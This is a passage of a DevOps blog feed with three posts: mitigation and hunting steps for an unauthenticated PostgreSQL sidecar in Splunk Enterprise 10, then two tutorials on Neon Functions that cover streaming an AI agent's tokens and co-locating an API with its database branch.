<li><strong>9.4 and earlier are not affected</strong>, because they predate the PostgreSQL sidecar, which is the whole reason the exposure exists in the 10 line and not before.</li>
</ul>
<p>If you run <strong>Splunk Cloud</strong>, Splunk manages that patching; the urgent action is for self-managed Enterprise installs. The vulnerability was published on June 10, 2026 and the exploitation status moved to active by June 19.</p>
<h2 id="h2-what-to-do-now" class="group relative scroll-mt-24">
        <a href="#h2-what-to-do-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to do now
        </a>
        </h2><p>The fix is an upgrade, and there is a real mitigation if you cannot upgrade immediately.</p>
<p><strong>1. Upgrade</strong> to 10.2.4 or 10.0.7 (or later). This is the actual remediation.</p>
<p><strong>2. If you cannot upgrade today, disable the PostgreSQL sidecar service.</strong> The advisory calls this out as the mitigation. You lose the features that depend on it, but you close the hole.</p>
<p><strong>3. Check whether the sidecar is even reachable.</strong> A missing-auth bug only matters if an attacker can reach the port. On each Splunk host, see what is listening and from where:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># What is listening, and is the Postgres sidecar bound to all interfaces?</span>
<span class="hljs-built_in">sudo</span> ss -tlnp | grep -i postgres
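<span class="hljs-comment"># or, more broadly, anything exposed beyond localhost (header row kept;</span>
<span class="hljs-comment"># the match is anchored so a routable address that merely contains ::1 is still listed)</span>
<span class="hljs-built_in">sudo</span> ss -tlnp | awk <span class="hljs-string">&#x27;NR == 1 || $4 !~ /^(127\.|\[::1\])/&#x27;</span>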
</code></pre><p>If that sidecar is bound to <code>0.0.0.0</code> and your Splunk hosts are reachable from anything other than a tightly controlled management network, you are in the exposed group. Firewall it to localhost or a management subnet regardless of patch state.</p>
<p><strong>4. Hunt for the file-write footprint.</strong> Because the primitive is arbitrary file create/truncate as the Splunk user, look for what that leaves behind: recently created or zero-length files under Splunk&#39;s directories and writable paths, unexpected changes to startup or config files, and anomalous processes spawned by the Splunk service account.</p>
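<p>The file part of step 4 can be scripted. The sweep below is an added example, not code from Splunk or the advisory: the function name <code>sweep_footprint</code>, the time window, the optional owner filter, and the list of config and script name patterns are assumptions to adapt.</p>

```bash
# Added example: sweep a directory tree for the create/truncate footprint.
# Assumptions (not from the advisory): the name patterns below, the window
# you pass in, and the optional owner (the Splunk service account).

# sweep_footprint ROOT MINUTES [OWNER]
# Prints sorted "KIND<TAB>PATH" lines for regular files under ROOT whose
# inode changed within the last MINUTES:
#   EMPTY    size 0: created empty or truncated
#   CHANGED  non-empty file that looks like a config or script
# ctime (-cmin) is used instead of mtime because touch(1) can set mtime
# back, while the kernel updates ctime on create, truncate, chmod and chown.
sweep_footprint() (
  root=$1
  minutes=$2
  owner=${3:-}

  [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }
  case $minutes in
    ''|*[!0-9]*) echo "MINUTES must be a whole number" >&2; return 2 ;;
  esac

  # Reuse the positional parameters as an optional "-user OWNER" filter.
  if [ -n "$owner" ]; then set -- -user "$owner"; else set --; fi

  # -xdev keeps the sweep on one filesystem. Errors from unreadable paths
  # stay on stderr so the operator can see what was not covered.
  {
    find "$root" -xdev -type f "$@" -size 0 -cmin "-$minutes" \
      -exec printf 'EMPTY\t%s\n' {} + || true
    find "$root" -xdev -type f "$@" ! -size 0 -cmin "-$minutes" \
      \( -name '*.conf' -o -name '*.sh' -o -name '*.py' \) \
      -exec printf 'CHANGED\t%s\n' {} + || true
  } | LC_ALL=C sort
)
```

<p>Run it as root against <code>$SPLUNK_HOME</code> and any other path the Splunk account can write, for example <code>sweep_footprint "$SPLUNK_HOME" 1440 splunk</code>, where the account name <code>splunk</code> is an assumption. Empty files also occur in a healthy install, so compare hits against a known-good host before treating them as findings.</p>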
<div class="post-callout post-callout--tip"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M9 18h6"/><path d="M10 22h4"/><path d="M15.1 14c.2-1 .7-1.7 1.4-2.5A4.6 4.6 0 0 0 18 8 6 6 0 0 0 6 8c0 1 .2 2.2 1.5 3.5.7.8 1.2 1.5 1.4 2.5"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Tip</span><div class="post-callout__body"><p>Pull this one into your detection content too. A SIEM that can be compromised through an unauthenticated side door is also the tool you would normally use to catch the compromise, so make sure the Splunk host&#39;s own process and file-integrity telemetry is going somewhere the Splunk box does not solely control.</p>
</div></div></div><h2 id="h2-the-part-that-outlives-this-cve" class="group relative scroll-mt-24">
        <a href="#h2-the-part-that-outlives-this-cve" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The part that outlives this CVE
        </a>
        </h2><p>Patch the bug and the headline is over. The pattern is not.</p>
<p>Modern &quot;appliance&quot; software (SIEMs, observability suites, internal developer platforms, self-hosted SaaS) increasingly ships with helper services baked in. A bundled PostgreSQL for metadata. A Redis for caching. A message broker for events. An embedded object store. These are convenient: the product works out of the box because its dependencies come with it. They are also attack surface you inherited without choosing it, and they have three uncomfortable properties.</p>
<p>They are <strong>invisible</strong>. Nobody filed a ticket to stand up that Postgres, so it is not in your inventory, your CMDB, or your threat model. You cannot defend a service you do not know is running.</p>
<p>They are <strong>on someone else&#39;s patch cadence</strong>. The bundled database is versioned and updated by the vendor, inside the product, on the vendor&#39;s schedule. You do not get to apply a Postgres CVE fix to it directly; you wait for the appliance update. Splunk&#39;s sidecar is exactly this: a database you do not administer, patched only when Splunk ships a new build.</p>
<p>They are <strong>assumed to be internal</strong>, which quietly gets read as &quot;safe.&quot; The sidecar talks to the main process over the loopback or the local network, so it was built as if only trusted callers would ever reach it. Missing authentication looks acceptable right up until the host is multi-homed, the port binds to <code>0.0.0.0</code>, or someone is already on the segment.</p>
<p>So the durable takeaway is an inventory and segmentation habit, not a one-time patch:</p>
<ul>
<li><strong>Inventory what your tools spawn.</strong> For the platforms that matter, actually look: <code>ss -tlnp</code> on the hosts, the container or pod list for the deployment, the process tree under the service account. Write down every helper service and what port it listens on.</li>
<li><strong>Segment internal sidecars by default.</strong> Bind helper services to localhost or a dedicated management network, and firewall them there. &quot;It is only for internal use&quot; should be enforced by the network, not assumed by the code.</li>
<li><strong>Do not equate internal with authenticated.</strong> Treat an unauthenticated internal endpoint as a finding in its own right, before someone else finds it for you.</li>
<li><strong>Watch vendor changelogs for new bundled dependencies.</strong> &quot;Now includes an embedded PostgreSQL&quot; in release notes is a security event, not just a feature. It means your attack surface changed and your inventory is now out of date.</li>
</ul>
<p>CVE-2026-20253 is a clean, fixable bug, and if you run Splunk Enterprise 10 you should go fix it now. But the reason it is worth more than a line in a patch log is that almost every team is running some tool that quietly brought its own database along, and almost nobody has it written down.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Streaming an AI Agent Without a Function Timeout]]></title>
      <link>https://devops-daily.com/posts/neon-functions-streaming-without-timeout</link>
      <description><![CDATA[Long agent loops and long token streams run into the same wall: a serverless function that hits its execution cap and cuts the connection. Neon Functions hold long-lived streaming connections by default. I deployed two endpoints to prove it: one streamed for 90 seconds, the other streamed an agent token by token starting at 466 ms.]]></description>
      <pubDate>Sat, 27 Jun 2026 14:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-streaming-without-timeout</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[serverless]]></category><category><![CDATA[ai-agents]]></category><category><![CDATA[streaming]]></category><category><![CDATA[functions]]></category>
      <content:encoded><![CDATA[<p>An AI agent and a serverless function want different things. The agent wants to think, call a tool, stream some tokens, call another tool, and keep the connection open the whole time, which can be tens of seconds or more. A lot of serverless tiers want the opposite: do your work quickly and return, because the invocation has an execution cap. Put them together and you get the failure everyone who has shipped an agent has seen at least once: the response is still streaming when the platform decides time is up and closes the socket.</p>
<p>This is the second post in our series on <a href="https://neon.com/docs/compute/functions/overview">Neon Functions</a>. The first was about <a href="https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch">where your compute runs relative to your data</a>; this one is about how long it is allowed to keep talking. Neon Functions are built to hold long-lived streaming connections, so a slow agent or a long stream is a normal request, not a fight with a timeout. To show it rather than assert it, I deployed two endpoints and measured them.</p>
<p>(Companion repo, deploy it yourself: <a href="https://github.com/The-DevOps-Daily/neon-streaming-demo">The-DevOps-Daily/neon-streaming-demo</a>.)</p>
<h2 id="h2-two-endpoints-one-config" class="group relative scroll-mt-24">
        <a href="#h2-two-endpoints-one-config" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Two endpoints, one config
        </a>
        </h2><p>The whole backend is a single Hono function with the AI Gateway switched on in <code>neon.ts</code>:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">aiGateway</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">stream</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;streaming demo&#x27;</span>, <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span> },
    },
  },
});
</code></pre><div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;deploy the streaming function&quot;,&quot;steps&quot;:[{&quot;cmd&quot;:&quot;neonctl link --project-name streaming --region-id aws-us-east-2&quot;,&quot;output&quot;:&quot;Created project (\&quot;streaming\&quot;) in aws-us-east-2 and linked .neon&quot;},{&quot;cmd&quot;:&quot;neonctl deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  service  function:stream\n\nFunction URLs\n  stream: https://br-...-stream.compute.c-3.us-east-2.aws.neon.tech/\n\nUtilized services: Postgres, Functions, AI Gateway\nPulled 7 Neon variables into .env.local&quot;}]}"></div><p>The streaming itself is ordinary Hono. The first endpoint holds a server-sent-events connection open and emits a tick every second, for as many seconds as you ask:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { <span class="hljs-title class_">Hono</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono&#x27;</span>;
<span class="hljs-keyword">import</span> { streamSSE } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono/streaming&#x27;</span>;

<span class="hljs-keyword">const</span> app = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Hono</span>();

app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/long-stream&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">c</span>) =&gt;</span> {
  <span class="hljs-comment">// Clamp to 1..600 seconds; a non-numeric query value falls back to 90.</span>
  <span class="hljs-keyword">const</span> requested = <span class="hljs-title class_">Number</span>(c.<span class="hljs-property">req</span>.<span class="hljs-title function_">query</span>(<span class="hljs-string">&#x27;seconds&#x27;</span>) ?? <span class="hljs-string">&#x27;90&#x27;</span>);
  <span class="hljs-keyword">const</span> seconds = <span class="hljs-title class_">Number</span>.<span class="hljs-title function_">isFinite</span>(requested) ? <span class="hljs-title class_">Math</span>.<span class="hljs-title function_">min</span>(<span class="hljs-number">600</span>, <span class="hljs-title class_">Math</span>.<span class="hljs-title function_">max</span>(<span class="hljs-number">1</span>, <span class="hljs-title class_">Math</span>.<span class="hljs-title function_">floor</span>(requested))) : <span class="hljs-number">90</span>;
  <span class="hljs-keyword">const</span> start = <span class="hljs-title class_">Date</span>.<span class="hljs-title function_">now</span>();
  <span class="hljs-keyword">return</span> <span class="hljs-title function_">streamSSE</span>(c, <span class="hljs-title function_">async</span> (stream) =&gt; {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> i = <span class="hljs-number">1</span>; i &lt;= seconds; i++) {
      <span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">writeSSE</span>({ <span class="hljs-attr">event</span>: <span class="hljs-string">&#x27;tick&#x27;</span>, <span class="hljs-attr">data</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ <span class="hljs-attr">tick</span>: i, <span class="hljs-attr">elapsed_ms</span>: <span class="hljs-title class_">Date</span>.<span class="hljs-title function_">now</span>() - start }) });
      <span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">sleep</span>(<span class="hljs-number">1000</span>);
    }
    <span class="hljs-comment">// total_ms matches the final "done" event shown in the run below.</span>
    <span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">writeSSE</span>({ <span class="hljs-attr">event</span>: <span class="hljs-string">&#x27;done&#x27;</span>, <span class="hljs-attr">data</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ <span class="hljs-attr">ticks</span>: seconds, <span class="hljs-attr">total_ms</span>: <span class="hljs-title class_">Date</span>.<span class="hljs-title function_">now</span>() - start }) });
  });
});
</code></pre><h2 id="h2-it-streamed-for-90-seconds-without-being-asked-twice" class="group relative scroll-mt-24">
        <a href="#h2-it-streamed-for-90-seconds-without-being-asked-twice" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          It streamed for 90 seconds without being asked twice
        </a>
        </h2><p>I called <code>/long-stream?seconds=90</code> and let it run. It ticked once a second, on the second, for a minute and a half, and closed cleanly on its own terms:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;curl -N .../long-stream?seconds=90&quot;,&quot;prompt&quot;:&quot;&gt;&quot;,&quot;steps&quot;:[{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:1,\&quot;elapsed_ms\&quot;:0}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:10,\&quot;elapsed_ms\&quot;:9012}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:30,\&quot;elapsed_ms\&quot;:29034}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:60,\&quot;elapsed_ms\&quot;:59066}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:90,\&quot;elapsed_ms\&quot;:89099}&quot;},{&quot;output&quot;:&quot;event: done   data: {\&quot;ticks\&quot;:90,\&quot;total_ms\&quot;:90099}&quot;}]}"></div><p>Ninety seconds is not a magic number; I picked it because it is comfortably past the execution cap a lot of serverless functions ship with by default, and the function did not care. No special mode, no config flag, no &quot;streaming response&quot; opt-in. The handler just held the connection.</p>
<div class="post-callout post-callout--note"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><circle cx="12" cy="12" r="10"/><path d="M12 16v-4"/><path d="M12 8h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Note</span><div class="post-callout__body"><p>To be precise about the comparison: this is about defaults and design, not &quot;infinite versus finite.&quot; Traditional serverless functions cap a single invocation low by default (Vercel&#39;s Hobby tier at 10 seconds, Pro at 60), which is exactly where a slow agent gets cut off. Platforms do offer longer runs when you reach for them: Vercel&#39;s Fluid Compute extends to 300 to 1800 seconds, and AWS Lambda allows up to 15 minutes. The point is that long-lived streaming is the default behaviour of a Neon Function, not a setting you discover after your agent times out in production.</p>
</div></div></div><h2 id="h2-now-stream-an-actual-agent" class="group relative scroll-mt-24">
        <a href="#h2-now-stream-an-actual-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Now stream an actual agent
        </a>
        </h2><p>A ticking clock proves the connection lasts. The real workload is a model streaming tokens. The second endpoint sends the prompt to the <a href="https://neon.com/docs/ai-gateway/overview">Neon AI Gateway</a> with <code>stream: true</code> and relays each token to the caller as it arrives:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">const</span> upstream = <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">`<span class="hljs-subst">${process.env.NEON_AI_GATEWAY_BASE_URL}</span>/ai-gateway/mlflow/v1/chat/completions`</span>, {
  <span class="hljs-attr">method</span>: <span class="hljs-string">&#x27;POST&#x27;</span>,
  <span class="hljs-attr">headers</span>: { <span class="hljs-title class_">Authorization</span>: <span class="hljs-string">`Bearer <span class="hljs-subst">${process.env.NEON_AI_GATEWAY_TOKEN}</span>`</span>, <span class="hljs-string">&#x27;content-type&#x27;</span>: <span class="hljs-string">&#x27;application/json&#x27;</span> },
  <span class="hljs-attr">body</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ <span class="hljs-attr">model</span>: <span class="hljs-string">&#x27;gpt-5-nano&#x27;</span>, <span class="hljs-attr">stream</span>: <span class="hljs-literal">true</span>, messages }),
});
<span class="hljs-comment">// ...parse the upstream SSE and re-emit each delta as it lands</span>
<span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">writeSSE</span>({ <span class="hljs-attr">event</span>: <span class="hljs-string">&#x27;token&#x27;</span>, <span class="hljs-attr">data</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ delta }) });
</code></pre><p>Calling it with a small prompt, the first token came back at <strong>466 ms</strong> and the full 62-token reply finished at about <strong>2.0 seconds</strong>. The reader sees the answer forming almost immediately instead of waiting two seconds for a wall of text:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Streaming vs waiting: when you see the agent's reply&quot;,&quot;unit&quot;:&quot;s&quot;,&quot;caption&quot;:&quot;POST /agent, gpt-5-nano through the Neon AI Gateway, 62 tokens. Streaming means the first token lands at ~0.47s; without streaming the reader waits for the whole ~2.0s reply. The gap grows with longer answers and multi-step agents.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;First token visible (streaming)&quot;,&quot;value&quot;:0.47},{&quot;label&quot;:&quot;Whole reply (no streaming)&quot;,&quot;value&quot;:2}]}"></div><p>Two seconds is short because the model and the prompt are small. The reason this matters is that real agents are not short: they make several model calls, run tools between them, and a full run is routinely tens of seconds. On a platform that caps invocations at 10 or 60 seconds, that run is a gamble against the clock. On a function built to hold the stream, it is just a request that takes a while.</p>
<h2 id="h2-what-it-is-and-what-it-is-not" class="group relative scroll-mt-24">
        <a href="#h2-what-it-is-and-what-it-is-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it is, and what it is not
        </a>
        </h2><div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>Private preview, one region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created inside the preview. Plan accordingly before building on it.</p>
</div></div></div><p>Two more things worth knowing before you reach for this:</p>
<ul>
<li><strong>It is request/response, even when the response is long.</strong> These functions answer a caller and can keep streaming to it for a long time, including over WebSockets and SSE. They are not a background job runner. Work that should outlive the request (queues, retries, scheduled tasks) belongs to something like Inngest or QStash.</li>
<li><strong>Idle functions can be evicted.</strong> A long <em>active</em> stream is fine; a function sitting idle may be scaled to zero and cold-start on the next call. That is the usual serverless tradeoff, not a streaming-specific one.</li>
</ul>
<h2 id="h2-who-this-is-for" class="group relative scroll-mt-24">
        <a href="#h2-who-this-is-for" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who this is for
        </a>
        </h2><p>If you are shipping anything agentic (a chat assistant, a tool-using agent, a long generation, an MCP server holding a session), the timeout is the wall you hit first, and the usual workaround is to learn your platform&#39;s extended-duration mode and hope you configured it right. A function that holds the stream by default removes that whole category of &quot;why did my response get cut off&quot; debugging.</p>
<p>The full demo, both endpoints, is here. The streaming logic is about 80 lines:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-streaming-demo"></div><p>Next in the series: a Postgres-backed MCP server in about twenty lines, and preview environments that include the backend, not just the frontend. The strategy behind all of it is in <a href="https://devops-daily.com/posts/neon-backend-platform-not-just-postgres">Neon is becoming a backend platform, not just Postgres</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Compute That Lives on Your Database Branch]]></title>
      <link>https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch</link>
      <description><![CDATA[Neon Functions run your code in the same region as your Postgres, on a per-branch URL. To see why that matters I deployed a small API and timed a query from inside the function versus from a machine across the Atlantic: 1.2 ms against 135 ms. Here is how it works, with the real numbers and the repo.]]></description>
      <pubDate>Sat, 27 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[serverless]]></category><category><![CDATA[postgres]]></category><category><![CDATA[functions]]></category><category><![CDATA[platform-engineering]]></category>
      <content:encoded><![CDATA[<p>Ask where your backend code runs relative to your database and the answer is often &quot;somewhere else.&quot; Your function is in one provider&#39;s <code>us-east-1</code>, your Postgres is in another region entirely, and every query crosses that gap. Most of the time you don&#39;t see it, because one query is fast enough to ignore. Then a request makes eight queries in sequence, each pays the round trip, and suddenly an endpoint that should take milliseconds takes most of a second.</p>
<p><a href="https://neon.com/docs/compute/functions/overview">Neon Functions</a>, part of Neon&#39;s June 2026 platform preview, takes a different position: run the compute in the same region as the database branch, on a URL scoped to that branch. This is the first in a series on what that buys you. It is also the simplest to demonstrate, because the benefit is something you can measure. I deployed a small REST API and timed a trivial query two ways. The numbers are at the bottom, and they are not close.</p>
<p>(Companion repo, deploy it yourself: <a href="https://github.com/The-DevOps-Daily/neon-functions-demo">The-DevOps-Daily/neon-functions-demo</a>.)</p>
<h2 id="h2-the-whole-backend-is-one-config-file" class="group relative scroll-mt-24">
        <a href="#h2-the-whole-backend-is-one-config-file" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The whole backend is one config file
        </a>
        </h2><p>Neon ships starter templates through its CLI. The REST API is one of them:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;scaffold + deploy&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;scaffold a Hono + Drizzle REST API&quot;},{&quot;cmd&quot;:&quot;neonctl bootstrap ./api --template hono&quot;,&quot;output&quot;:&quot;Scaffolded 23 files into ./api&quot;},{&quot;comment&quot;:&quot;create a project (us-east-2, preview only) and deploy&quot;},{&quot;cmd&quot;:&quot;neonctl link --project-name api --region-id aws-us-east-2&quot;,&quot;output&quot;:&quot;Created project (\&quot;api\&quot;) in aws-us-east-2 and linked .neon on branch main&quot;},{&quot;cmd&quot;:&quot;neonctl deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  service  function:todos\n\nFunction URLs\n  todos: https://br-restless-sound-...-todos.compute.c-3.us-east-2.aws.neon.tech/\n\nUtilized services: Postgres, Functions&quot;}]}"></div><p>What gets deployed is declared in <code>neon.ts</code>. For this API it is three lines of intent: take <code>src/index.ts</code> and run it as a function called <code>todos</code>.</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">todos</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;todo api&#x27;</span>, <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span> },
    },
  },
});
</code></pre><p>No connection string in there, no region to pick for the compute, no URL to reserve. The <code>DATABASE_URL</code> is injected at deploy time, and the function lands in the same region as the branch automatically.</p>
<h2 id="h2-the-function-is-a-normal-web-handler" class="group relative scroll-mt-24">
        <a href="#h2-the-function-is-a-normal-web-handler" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The function is a normal web handler
        </a>
        </h2><p>There is nothing Neon-specific in the application code. It is a standard <a href="https://hono.dev">Hono</a> app talking to Postgres through a connection pool, the same code you would write for any Node host:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { <span class="hljs-title class_">Hono</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono&#x27;</span>;
<span class="hljs-keyword">import</span> { drizzle } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm/node-postgres&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">Pool</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { parseEnv } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/env&#x27;</span>;
<span class="hljs-keyword">import</span> config <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;../neon&#x27;</span>;
<span class="hljs-keyword">import</span> { todos } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;./db/schema&#x27;</span>;

<span class="hljs-keyword">const</span> env = <span class="hljs-title function_">parseEnv</span>(config);
<span class="hljs-keyword">const</span> pool = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Pool</span>({ <span class="hljs-attr">connectionString</span>: env.<span class="hljs-property">postgres</span>.<span class="hljs-property">databaseUrl</span>, <span class="hljs-attr">max</span>: <span class="hljs-number">5</span> });
<span class="hljs-keyword">const</span> db = <span class="hljs-title function_">drizzle</span>(pool);

<span class="hljs-keyword">const</span> app = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Hono</span>();
app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/todos&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; c.<span class="hljs-title function_">json</span>(<span class="hljs-keyword">await</span> db.<span class="hljs-title function_">select</span>().<span class="hljs-title function_">from</span>(todos)));
app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/todos&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">const</span> { text } = <span class="hljs-keyword">await</span> c.<span class="hljs-property">req</span>.<span class="hljs-property">json</span>&lt;{ <span class="hljs-attr">text</span>: <span class="hljs-built_in">string</span> }&gt;();
  <span class="hljs-keyword">const</span> [row] = <span class="hljs-keyword">await</span> db.<span class="hljs-title function_">insert</span>(todos).<span class="hljs-title function_">values</span>({ text }).<span class="hljs-title function_">returning</span>();
  <span class="hljs-keyword">return</span> c.<span class="hljs-title function_">json</span>(row, <span class="hljs-number">201</span>);
});

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> app;
</code></pre><p>After <code>neonctl deploy</code>, that handler answers at a branch-scoped URL, and the create/read path works end to end:</p>
<pre><code class="hljs language-bash">curl -X POST <span class="hljs-string">&quot;<span class="hljs-variable">$URL</span>/todos&quot;</span> -H <span class="hljs-string">&#x27;content-type: application/json&#x27;</span> -d <span class="hljs-string">&#x27;{&quot;text&quot;:&quot;ship it&quot;}&#x27;</span>
<span class="hljs-comment"># {&quot;id&quot;:1,&quot;text&quot;:&quot;ship it&quot;,&quot;createdAt&quot;:&quot;2026-06-25T16:17:10.692Z&quot;}  (201)</span>
curl <span class="hljs-string">&quot;<span class="hljs-variable">$URL</span>/todos&quot;</span>
<span class="hljs-comment"># [{&quot;id&quot;:1,&quot;text&quot;:&quot;ship it&quot;,&quot;createdAt&quot;:&quot;2026-06-25T16:17:10.692Z&quot;}]  (200)</span>
</code></pre><p>The phrase &quot;branch-scoped URL&quot; is the part worth slowing down on. Open a branch off this one and it gets its own function at its own URL, running your latest code against that branch&#39;s data. The preview environment for a pull request stops being &quot;the frontend plus a shared backend&quot; and becomes a real, isolated copy. We will spend a whole post on that later; for now, the point is that the function and the branch are one unit.</p>
<h2 id="h2-now-measure-the-distance" class="group relative scroll-mt-24">
        <a href="#h2-now-measure-the-distance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Now measure the distance
        </a>
        </h2><p>Here is the part you can put a number on. The function exposes a <code>/db-latency</code> endpoint that times thirty <code>SELECT 1</code> round trips from inside the handler and returns the median. Because the function runs in the same region as the branch, this is the local hop:</p>
<pre><code class="hljs language-bash">curl <span class="hljs-string">&quot;<span class="hljs-variable">$URL</span>/db-latency&quot;</span>
<span class="hljs-comment"># { &quot;from&quot;: &quot;neon function (us-east-2, co-located with Postgres)&quot;,</span>
<span class="hljs-comment">#   &quot;runs&quot;: 30, &quot;min_ms&quot;: 1.13, &quot;median_ms&quot;: 1.19, &quot;p95_ms&quot;: 1.62 }</span>
</code></pre><p>Just over a millisecond. Then I ran the exact same <code>SELECT 1</code>, against the exact same database, from a machine in Europe (this site&#39;s build box, a Raspberry Pi a long way from <code>us-east-2</code>):</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># same query, same database, from a machine on another continent</span>
<span class="hljs-comment"># { &quot;from&quot;: &quot;europe -&gt; us-east-2&quot;, &quot;runs&quot;: 30,</span>
<span class="hljs-comment">#   &quot;min_ms&quot;: 130.46, &quot;median_ms&quot;: 134.54, &quot;p95_ms&quot;: 138 }</span>
